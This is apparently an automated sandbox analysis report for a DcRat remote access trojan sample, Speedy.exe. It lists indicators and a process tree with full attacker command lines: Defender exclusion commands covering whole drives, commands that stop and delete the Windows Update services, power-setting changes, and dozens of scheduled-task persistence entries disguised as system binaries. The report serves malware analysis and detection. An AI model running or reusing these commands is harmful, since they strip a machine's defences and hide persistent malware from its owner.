Analysis

Max time kernel: 136s
Max time network: 130s
Platform: windows10-2004_x64
Resource: win10v2004-20240709-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 21-07-2024 19:24

Static task: static1

Behavioral task: behavioral1
- Sample: Speedy.exe
- Resource: win7-20240705-en

Behavioral task: behavioral2
- Sample: Speedy.exe
- Resource: win10v2004-20240709-en
General

Target: Speedy.exe
Size: 160KB
MD5: 7b9610cdb99b9973810e3e25e2548ba9
SHA1: 776ecee620560f31d35fbd9894737e7b4133d29a
SHA256: 1c0757e44587291a3152fe7c3ee1d49c64c5ad9bbfd2123a65a772783f0bc096
SHA512: 29d185e3dcd8bfadd3f8c30bf03ac57a44d10581859a6a449339b63e86be9d02c8a9382f27d82474006770afce8f1d80cb69acd8abc761656bd9cf3d2a4e3660
SSDEEP: 3072:Tu6Wqq2AkZytOeiibKnESWEA6eb7THe+fgy2MPSX16zhn9gkZkb/Xw:q69q2AgytuimESWEA7DfgynPSX1mn9ub
Malware Config
Signatures
DcRat
DarkCrystal (DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Modifies security service (2 TTPs, 5 IoCs)
Processes:
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
Process spawned unexpected child process (39 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
- Parent C:\Windows\system32\wbem\wmiprvse.exe (PID 2168) is not expected to spawn schtasks.exe; child PIDs: 5036, 1084, 648, 3180, 3060, 4516, 552, 3384, 3228, 752, 1836, 4092, 3980, 1008, 2556, 4268, 1544, 4108, 4372, 4484, 4364, 464, 4616, 4688, 3080, 448, 4164, 2896, 3580, 4316, 4628, 2192, 4228, 4824, 3412, 2780, 5036, 4552, 1084
Processes (resource / yara_rule):
- C:\Users\Admin\AppData\Local\Temp\Tor.exe: dcrat
- C:\DriverHostCrtNet\comSvc.exe: dcrat
- behavioral2/memory/4404-67-0x0000000000150000-0x0000000000306000-memory.dmp: dcrat
- C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp: dcrat
- C:\DriverHostCrtNet\System.exe: dcrat
- C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp: dcrat
- C:\Program Files (x86)\Google\Temp\winlogon.exe: dcrat
- C:\Program Files\Windows Multimedia Platform\lsass.exe: dcrat
- behavioral2/memory/3320-450-0x0000000000440000-0x00000000005F6000-memory.dmp: dcrat
Blocklisted process makes network request (1 IoCs)
Processes:
- flow 7: pid 1664 powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 14 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes:
- powershell.exe PIDs: 2764, 3140, 1948, 2820, 2472, 4364, 3364, 3940, 5092, 4616, 2784, 2816, 3452, 1664
Downloads MZ/PE file
Drops file in Drivers directory (2 IoCs)
Processes:
- File created: C:\Windows\system32\drivers\etc\hosts (ft.exe)
- File opened for modification: C:\Windows\System32\drivers\etc\hosts (comSvc.exe)
Checks computer location settings (2 TTPs, 5 IoCs)
Looks up the country code configured in the registry, likely a geofence.
Processes:
- Key value queried: \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation (Speedy.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation (Tor.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation (WScript.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation (comSvc.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation (System.exe)
Executes dropped EXE (5 IoCs)
Processes:
- pid 4876: ft.exe
- pid 1252: Tor.exe
- pid 4404: comSvc.exe
- pid 3320: System.exe
- pid 5280: System.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
Power Settings (1 TTPs, 5 IoCs)
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
- pid 4980: powercfg.exe
- pid 3220: powercfg.exe
- pid 4260: powercfg.exe
- pid 2720: powercfg.exe
- pid 1256: cmd.exe
Drops file in Program Files directory (27 IoCs)
Processes:
- File created: C:\Program Files (x86)\Google\Temp\cc11b995f2a76d (comSvc.exe)
- File opened for modification: C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE5A1.tmp (comSvc.exe)
- File created: C:\Program Files\ModifiableWindowsApps\conhost.exe (comSvc.exe)
- File created: C:\Program Files\Windows Security\BrowserCore\en-US\e6c9b481da804f (comSvc.exe)
- File opened for modification: C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C0.tmp (comSvc.exe)
- File opened for modification: C:\Program Files (x86)\Google\Update\1.3.36.371\RCXF4C1.tmp (comSvc.exe)
- File created: C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe (comSvc.exe)
- File opened for modification: C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe (comSvc.exe)
- File opened for modification: C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe (comSvc.exe)
- File created: C:\Program Files\Windows Multimedia Platform\lsass.exe (comSvc.exe)
- File opened for modification: C:\Program Files\Windows Security\BrowserCore\en-US\RCXEB05.tmp (comSvc.exe)
- File opened for modification: C:\Program Files (x86)\Google\Temp\RCXFA73.tmp (comSvc.exe)
- File opened for modification: C:\Program Files (x86)\Google\Temp\winlogon.exe (comSvc.exe)
- File opened for modification: C:\Program Files\Windows Multimedia Platform\RCX11F.tmp (comSvc.exe)
- File opened for modification: C:\Program Files\Windows Multimedia Platform\lsass.exe (comSvc.exe)
- File created: C:\Program Files (x86)\Google\Temp\winlogon.exe (comSvc.exe)
- File opened for modification: C:\Program Files\Windows Security\BrowserCore\en-US\RCXEAF4.tmp (comSvc.exe)
- File opened for modification: C:\Program Files\Java\jre-1.8\lib\images\cursors\RCXE600.tmp (comSvc.exe)
- File created: C:\Program Files\Google\Chrome\updaterload.exe (ft.exe)
- File created: C:\Program Files (x86)\Google\Update\1.3.36.371\27d1bcfc3c54e0 (comSvc.exe)
- File opened for modification: C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe (comSvc.exe)
- File created: C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe (comSvc.exe)
- File created: C:\Program Files\Java\jre-1.8\lib\images\cursors\088424020bedd6 (comSvc.exe)
- File opened for modification: C:\Program Files (x86)\Google\Temp\RCXFA04.tmp (comSvc.exe)
- File opened for modification: C:\Program Files\Windows Multimedia Platform\RCX19D.tmp (comSvc.exe)
- File created: C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe (comSvc.exe)
- File created: C:\Program Files\Windows Multimedia Platform\6203df4a6bafc7 (comSvc.exe)
Drops file in Windows directory (5 IoCs)
Processes:
- File created: C:\Windows\Web\RuntimeBroker.exe (comSvc.exe)
- File created: C:\Windows\Web\9e8d7a4ca61bd9 (comSvc.exe)
- File opened for modification: C:\Windows\Web\RCXF019.tmp (comSvc.exe)
- File opened for modification: C:\Windows\Web\RCXF01A.tmp (comSvc.exe)
- File opened for modification: C:\Windows\Web\RuntimeBroker.exe (comSvc.exe)
Launches sc.exe (5 IoCs)
sc.exe is a Windows utility to control services on the system.
Processes:
- pid 2028: sc.exe
- pid 1620: sc.exe
- pid 4288: sc.exe
- pid 1708: sc.exe
- pid 3124: sc.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Modifies registry class (3 IoCs)
Processes:
- Key created: \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings (Tor.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ (comSvc.exe)
- Key created: \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings (System.exe)
Scheduled Task/Job: Scheduled Task (1 TTPs, 39 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- schtasks.exe PIDs: 648, 752, 3980, 2556, 4108, 464, 2896, 2192, 2780, 5036, 1084, 3384, 4092, 3080, 4824, 5036, 1836, 4372, 4688, 1084, 1008, 4616, 4316, 4228, 3412, 3180, 4516, 4268, 1544, 4364, 448, 4552, 3060, 552, 3228, 4484, 4164, 3580, 4628
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

Depth 1: C:\Users\Admin\AppData\Local\Temp\Speedy.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Speedy.exe"
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 4304

  Depth 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1664
    Depth 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2556
    Depth 3: C:\Users\Admin\AppData\Local\Temp\ft.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\ft.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID: 4876

      Depth 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 5092
      Depth 4: C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      - Suspicious use of WriteProcessMemory
      PID: 1380

        Depth 5: C:\Windows\system32\sc.exe
        Command line: sc stop UsoSvc
        - Launches sc.exe
        PID: 2028

        Depth 5: C:\Windows\system32\sc.exe
        Command line: sc stop WaaSMedicSvc
        - Launches sc.exe
        PID: 1620

        Depth 5: C:\Windows\system32\sc.exe
        Command line: sc stop wuauserv
        - Launches sc.exe
        PID: 4288

        Depth 5: C:\Windows\system32\sc.exe
        Command line: sc stop bits
        - Launches sc.exe
        PID: 1708

        Depth 5: C:\Windows\system32\sc.exe
        Command line: sc stop dosvc
        - Launches sc.exe
        PID: 3124

        Depth 5: C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        PID: 1540

        Depth 5: C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        PID: 452

        Depth 5: C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        - Modifies security service
        PID: 4060

        Depth 5: C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        PID: 1628

        Depth 5: C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        PID: 3824
      Depth 4: C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      - Power Settings
      - Suspicious use of WriteProcessMemory
      PID: 1256

        Depth 5: C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-ac 0
        - Power Settings
        - Suspicious use of AdjustPrivilegeToken
        PID: 4980

        Depth 5: C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -hibernate-timeout-dc 0
        - Power Settings
        - Suspicious use of AdjustPrivilegeToken
        PID: 3220

        Depth 5: C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -standby-timeout-ac 0
        - Power Settings
        - Suspicious use of AdjustPrivilegeToken
        PID: 4260

        Depth 5: C:\Windows\system32\powercfg.exe
        Command line: powercfg /x -standby-timeout-dc 0
        - Power Settings
        - Suspicious use of AdjustPrivilegeToken
        PID: 2720
      Depth 4: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell <#velngcggt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4304
    Depth 3: C:\Users\Admin\AppData\Local\Temp\Tor.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Tor.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID: 1252

      Depth 4: C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\KNpp6xs8D.vbe"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      PID: 4108

        Depth 5: C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\unV39Cxd.bat" "
        - Suspicious use of WriteProcessMemory
        PID: 1028

          Depth 6: C:\DriverHostCrtNet\comSvc.exe
          Command line: "C:\DriverHostCrtNet\comSvc.exe"
          - Drops file in Drivers directory
          - Checks computer location settings
          - Executes dropped EXE
          - Drops file in Program Files directory
          - Drops file in Windows directory
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 4404
            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
            - Command and Scripting Interpreter: PowerShell
            PID: 2472

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
            - Command and Scripting Interpreter: PowerShell
            PID: 3452

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
            - Command and Scripting Interpreter: PowerShell
            PID: 2820

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
            - Command and Scripting Interpreter: PowerShell
            PID: 3940

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
            - Command and Scripting Interpreter: PowerShell
            PID: 2816

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
            - Command and Scripting Interpreter: PowerShell
            PID: 1948
            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
            - Command and Scripting Interpreter: PowerShell
            PID: 3140

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
            - Command and Scripting Interpreter: PowerShell
            PID: 3364

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
            - Command and Scripting Interpreter: PowerShell
            PID: 4364

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
            - Command and Scripting Interpreter: PowerShell
            PID: 2764

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
            - Command and Scripting Interpreter: PowerShell
            PID: 2784

            Depth 7: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
            - Command and Scripting Interpreter: PowerShell
            PID: 4616
            Depth 7: C:\DriverHostCrtNet\System.exe
            Command line: "C:\DriverHostCrtNet\System.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - Modifies registry class
            PID: 3320

              Depth 8: C:\Windows\System32\WScript.exe
              Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41a9a8e6-06e8-42ac-bf79-d2643ae41989.vbs"
              PID: 1464

                Depth 9: C:\DriverHostCrtNet\System.exe
                Command line: C:\DriverHostCrtNet\System.exe
                - Executes dropped EXE
                PID: 5280

              Depth 8: C:\Windows\System32\WScript.exe
              Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09dcb6ba-2fbe-4e02-acba-0a7b176ef713.vbs"
              PID: 2292
Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID: 5036

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID: 1084

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID: 648

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID: 3180

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID: 3060
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4516
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3384
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3228
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1836
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3980
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4268
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1544
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4688
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4164
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4628
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4228
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4824
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3412
-
